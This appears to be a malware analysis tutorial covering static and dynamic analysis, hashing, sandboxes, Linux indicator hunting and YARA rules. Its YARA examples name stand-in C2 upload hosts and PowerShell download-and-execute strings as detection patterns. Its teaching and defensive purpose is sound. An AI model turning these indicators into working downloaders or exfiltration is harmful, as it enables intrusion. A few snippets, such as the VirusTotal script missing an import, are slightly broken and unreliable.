Skip to content

Malware Analysis Basics

Malware analysis is the process of understanding what a malicious program does, how it works, and what indicators it leaves behind. This note covers static and dynamic analysis techniques, sandboxing, hash-based identification, YARA rules, and common indicators of compromise (IOCs).


STATIC ANALYSIS DYNAMIC ANALYSIS
───────────────── ────────────────────────────────
Examine the file without Execute the sample in a controlled
executing it environment and observe behaviour
Techniques: Techniques:
File type identification Process monitoring
Hash computation Network traffic capture
String extraction Registry/file system changes
Disassembly / decompilation Memory inspection
Pros: Safe (no execution) Pros: Reveals actual runtime behaviour
Cons: Obfuscation can hide Cons: Sandbox evasion; detonation needed
true behaviour

The first step: understand what you’re dealing with before touching it.

Terminal window
# Identify file type (don't trust the extension)
file suspicious.exe
# ELF 64-bit LSB executable...
# PE32 executable (GUI) Intel 80386...
# Zip archive data...
# Common magic bytes (file headers):
# MZ (4D 5A) → Windows PE executable
# ELF (7F 45 4C 46) → Linux ELF binary
# PK (50 4B) → ZIP / Office documents (docx, xlsx are ZIPs)
# %PDF → PDF file
# \x7fELF → ELF binary
# Check magic bytes manually
xxd suspicious.exe | head -3
# or
hexdump -C suspicious.exe | head -5

Cryptographic hashes create a fingerprint for a file. Matching a hash to a known database identifies malware without analysis.

Terminal window
# Compute hashes
md5sum suspicious.exe # MD5 - fast; still used for identification (not integrity)
sha1sum suspicious.exe # SHA-1
sha256sum suspicious.exe # SHA-256 - primary standard for malware IOCs
# Save hash for reference
sha256sum suspicious.exe | awk '{print $1}' > sample.hash
cat sample.hash
# Look up hash on VirusTotal (CLI)
pip install vt-py
export VT_API_KEY="your_api_key_here"
python3 << 'EOF'
import vt, sys
HASH = "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f"
with vt.Client(os.environ["VT_API_KEY"]) as client:
file = client.get_object(f"/files/{HASH}")
print(f"Name: {file.meaningful_name}")
print(f"Detection: {file.last_analysis_stats['malicious']}/{sum(file.last_analysis_stats.values())} engines")
print(f"Family: {file.popular_threat_classification.get('suggested_threat_label', 'unknown')}")
EOF
# Or via curl
curl -s --request GET \
--url "https://www.virustotal.com/api/v3/files/$(sha256sum suspicious.exe | awk '{print $1}')" \
--header "x-apikey: $VT_API_KEY" | python3 -m json.tool | grep -E "malicious|type_description"

Strings embedded in binaries reveal intent - URLs, registry keys, file paths, error messages, commands.

Terminal window
# Extract all printable strings from a binary
strings suspicious.exe
# Filter for interesting patterns
strings suspicious.exe | grep -E "http[s]?://" # URLs
strings suspicious.exe | grep -iE "cmd|powershell|exec" # command execution
strings suspicious.exe | grep -iE "password|passwd|cred" # credential references
strings suspicious.exe | grep -E "HKCU|HKLM|Software" # Windows registry paths
strings suspicious.exe | grep -E "\.dll|LoadLibrary" # DLL loading
strings suspicious.exe | grep -E "CreateProcess|ShellExecute|WinExec" # process creation
# Unicode strings (wide strings - common in Windows malware)
strings -el suspicious.exe # 16-bit little-endian (UTF-16LE)
# Extract emails and IPs
strings suspicious.exe | grep -E "[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}"
strings suspicious.exe | grep -E "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}"
Terminal window
# Install pefile (Python library)
pip install pefile
python3 << 'EOF'
import pefile
pe = pefile.PE("suspicious.exe")
# Basic info
print(f"Machine: {hex(pe.FILE_HEADER.Machine)}") # 0x14c = x86, 0x8664 = x64
print(f"Timestamp: {pe.FILE_HEADER.TimeDateStamp}")
print(f"Sections: {[s.Name.decode().strip() for s in pe.sections]}")
# Check for suspicious section characteristics
for section in pe.sections:
name = section.Name.decode().strip('\x00')
print(f"Section: {name} | Entropy: {section.get_entropy():.2f} | RawSize: {section.SizeOfRawData}")
# Entropy > 7.0 suggests packed/encrypted content
# Imported DLLs and functions (reveal capability)
if hasattr(pe, 'DIRECTORY_ENTRY_IMPORT'):
for entry in pe.DIRECTORY_ENTRY_IMPORT:
print(f" DLL: {entry.dll.decode()}")
for imp in entry.imports:
if imp.name:
print(f" {imp.name.decode()}")
EOF

Suspicious Windows API imports by category:

CategorySuspicious APIs
Process injectionVirtualAllocEx, WriteProcessMemory, CreateRemoteThread
PersistenceRegSetValueEx, CreateService, ScheduledTaskCreate
NetworkInternetOpen, WSAConnect, URLDownloadToFile
File systemFindFirstFile, CopyFile, DeleteFile
Privilege escalationAdjustTokenPrivileges, ImpersonateLoggedOnUser
Anti-analysisIsDebuggerPresent, GetTickCount, QueryPerformanceCounter

Packed or encrypted malware has high entropy (random-looking data):

Terminal window
# Check section entropy (entropy > 7.2 = likely packed/encrypted)
python3 -c "
import pefile, math
def entropy(data):
if not data:
return 0
counts = {}
for byte in data:
counts[byte] = counts.get(byte, 0) + 1
return -sum((c/len(data)) * math.log2(c/len(data)) for c in counts.values())
pe = pefile.PE('suspicious.exe')
for s in pe.sections:
data = s.get_data()
print(f'{s.Name.decode().strip():10} entropy={entropy(data):.2f}')
"

A sandbox executes malware in a controlled, isolated environment and records everything it does.

ServiceTypeNotes
any.runInteractiveWatch execution in real time; interact with the sample
VirusTotalAutomatedRuns 70+ AV engines + some sandbox analysis
Joe SandboxAutomatedDetailed Windows/Linux/macOS analysis
Hybrid AnalysisAutomatedFree; Falcon Intelligence sandbox
Triage (tria.ge)AutomatedFast; API access; YARA matching
Terminal window
# Submit a sample via VirusTotal API
curl -s --request POST \
--url "https://www.virustotal.com/api/v3/files" \
--header "x-apikey: $VT_API_KEY" \
| python3 -m json.tool | grep -E '"id"|"type"'
# Get analysis results after a minute
ANALYSIS_ID="<id from above>"
curl -s --request GET \
--url "https://www.virustotal.com/api/v3/analyses/$ANALYSIS_ID" \
--header "x-apikey: $VT_API_KEY" \
| python3 -m json.tool | grep -E "status|malicious|harmless"
Terminal window
# Cuckoo Sandbox - self-hosted dynamic analysis platform
# (Runs malware in a VM; intercepts system calls and network traffic)
# Installation overview (simplified)
pip install cuckoo
cuckoo init
cuckoo community # download rules and signatures
# Configure a Windows 7 analysis VM in VirtualBox
# (Cuckoo agent must be installed in the VM)
# Submit a sample
cuckoo submit suspicious.exe
cuckoo submit --timeout 120 suspicious.exe # run for 2 minutes
# View results in web UI
cuckoo web runserver
# What Cuckoo captures:
# Process tree (parent-child relationships)
# System call trace (file, registry, network, process operations)
# Network traffic (PCAP)
# Screenshots (periodic)
# Memory dumps
# Extracted network IOCs (domains, IPs, URLs contacted)

IOCs are artifacts that signal a system has been compromised.

Terminal window
# 1. Unknown processes
ps aux | grep -v "$(ps aux | awk '{print $11}' | sort -u | grep -v grep)"
# More practically:
ps auxf # shows process tree (parent-child)
pstree -p # tree view with PIDs
# 2. Suspicious network connections (beaconing / C2 traffic)
ss -tulpan # all connections with processes
netstat -tulpan | grep ESTABLISHED | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -rn
# High frequency connections to same IP = possible beacon
# 3. Suspicious files in common locations
find /tmp /var/tmp /dev/shm -type f -executable 2>/dev/null
find /tmp -name "*.sh" -o -name "*.py" -o -name "*.pl" 2>/dev/null
find / -name ".*" -type f -newer /etc/passwd 2>/dev/null | head -20 # hidden files newer than passwd
# 4. Recently modified files in system directories
find /etc /usr/bin /usr/sbin -newer /tmp -type f 2>/dev/null
# 5. Persistence mechanisms
# Crontabs
crontab -l 2>/dev/null
for user in $(cut -f1 -d: /etc/passwd); do crontab -u $user -l 2>/dev/null; done
cat /etc/cron* /var/spool/cron/crontabs/* 2>/dev/null
# Systemd units added by malware
systemctl list-units --type=service --state=running | grep -v "\.service"
find /etc/systemd /usr/lib/systemd ~/.config/systemd -name "*.service" 2>/dev/null | xargs ls -la
# Linux LD_PRELOAD injection (library hijack)
cat /etc/ld.so.preload 2>/dev/null # should be empty or not exist
# 6. Unusual user accounts
awk -F: '$3 == 0 && $1 != "root" { print "ROOT UID: "$1 }' /etc/passwd
awk -F: '$NF !~ /nologin|false/ && $3 >= 1000 { print $1 }' /etc/passwd
lastlog | grep -v "Never logged in" | tail -20
Terminal window
# Capture network traffic from a suspicious process
PID=$(pgrep suspicious)
nsenter -t $PID -n tcpdump -i any -w /tmp/suspect-$PID.pcap &
# Look for beaconing patterns in a PCAP
tcpdump -r capture.pcap -nn 'tcp' | awk '{print $3}' | cut -d. -f1-4 | sort | uniq -c | sort -rn | head
# DNS queries (potential C2 domain generation algorithms - DGA)
tcpdump -r capture.pcap -nn 'port 53' | grep -v "ptr\|PTR\|SOA" | awk '{print $NF}' | sort | uniq -c | sort -rn
# tshark - extract all contacted IPs
tshark -r capture.pcap -T fields -e ip.dst -q | sort | uniq -c | sort -rn | head -20
# Look for long DNS names (possible DNS tunneling or DGA)
tshark -r capture.pcap -T fields -e dns.qry.name -q \
| awk 'length($0) > 30' | sort | uniq -c | sort -rn

YARA is the pattern-matching language for malware identification. Each rule describes strings or byte patterns, combined with logical conditions.

/* Basic YARA rule structure */
rule ExampleMalware {
meta:
description = "Detects Example malware C2 URLs"
author = "[email protected]"
date = "2025-03-11"
reference = "https://threatintel.example.com/report/123"
hash = "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f"
strings:
$url1 = "malicious-c2.ru/beacon" ascii
$url2 = "evil-domain.cn/upload" ascii wide // wide = UTF-16LE match
$mutex = "Global\\MutexName123" ascii
$pdb_path = "C:\\Users\\attacker\\malware.pdb" ascii
// Hex byte pattern (packed shellcode XOR key)
$xor_key = { 31 C0 50 68 }
// Regex pattern
$ip_regex = /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/ ascii
condition:
uint16(0) == 0x5A4D and // PE magic bytes "MZ"
filesize < 2MB and
any of ($url*) and // any URL string matches
$mutex and
not $pdb_path // exclude known samples
}
Terminal window
# Install YARA
apt install yara
# Write a rule and test it
cat > detect_poshell.yar << 'EOF'
rule PowerShellDownloader {
strings:
$ps1 = "powershell" nocase
$dl1 = "DownloadString" nocase
$dl2 = "Invoke-Expression" nocase
$web = "WebClient" nocase
$enc = "FromBase64String" nocase
condition:
3 of them
}
EOF
# Scan a file
yara -r detect_poshell.yar suspicious.exe
# Scan a directory recursively
yara -r detect_poshell.yar /tmp/samples/
# Scan memory of a running process
yara detect_poshell.yar -p 1234
# Use community rules (from Awesome-YARA, ESET, Mandiant, etc.)
# Clone signature sets
git clone https://github.com/Neo23x0/signature-base.git
# Scan with multiple rule files
yara -r signature-base/yara/mal_*.yar /tmp/suspicious.exe

1. SAFE ENVIRONMENT
→ Work in an isolated VM with no network access to production
→ Snapshot the VM before analysis; restore after
→ Use REMnux (remnux.org) - purpose-built Linux distro for analysis
2. IDENTIFY
→ Compute SHA-256 hash → check VirusTotal
→ file command, xxd for magic bytes
→ Check file entropy (packed = ~7.0+)
3. STATIC ANALYSIS
→ strings → filter for IPs, URLs, registry keys, commands
→ PE imports → identify capability categories
→ Disassemble: Ghidra (free) or IDA Pro (commercial)
4. DYNAMIC ANALYSIS
→ Submit to any.run or Hybrid Analysis
→ Or run in local Cuckoo sandbox
→ Capture: process tree, file/registry changes, network traffic
5. IOC EXTRACTION
→ Extract: file hashes, C2 IPs/domains, mutex names, registry keys
→ Encode in STIX/TAXII format for sharing
→ Write YARA rules for detection
6. REPORTING
→ Document: malware family, capabilities, C2 infrastructure
→ Share IOCs with your SIEM for blocking and alerting
→ Update EDR exclusions / detection rules